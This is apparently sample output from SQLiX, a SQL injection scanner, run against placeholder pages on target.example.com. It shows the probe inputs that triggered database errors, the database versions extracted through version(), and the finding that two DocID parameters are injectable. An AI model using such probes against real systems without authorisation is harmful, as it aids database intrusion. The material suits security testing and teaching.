======================================================
                   -- SQLiX --
 � Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URI obtained by flat file [crawling]
  http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2
         [+] working on DocID
                 [+] Method: MS-SQL error message
                 [+] Method: SQL error message
                         [FOUND] Match found INPUT:[user] - "Microsoft OLE DB Provider for ODBC Drivers"
                         [INFO] Error without quote
                         [INFO] Database identified: MySQL Server
                         [INFO] Current function: version()
                         [INFO] length: 19
                             4.1.20-community-nt
                         [FOUND] SQL error message
  http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2
         [+] working on DocID
                 [+] Method: MS-SQL error message
                 [+] Method: SQL error message
                         [FOUND] Match found INPUT:['] - "Microsoft OLE DB Provider for ODBC Drivers"
                         [INFO] Error without quote
                         [INFO] Database identified: PostgreSQL Server
                         [INFO] Current function: version()
                         [INFO] length: 88
                             PostgreSQL 8.0.7 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
                         [FOUND] SQL error message

RESULTS:
The variable [DocID] from [http://www.target.example.com/MySQL-DocumentDescriptionMagicQuote.asp?DocID=2] ...
		is vulnerable to SQL Injection [Error message (user) - MySQL].
The variable [DocID] from [http://www.target.example.com/PGSQL-DocumentDescription.asp?DocID=2] ...
		is vulnerable to SQL Injection [Error message (') - PostgreSQL].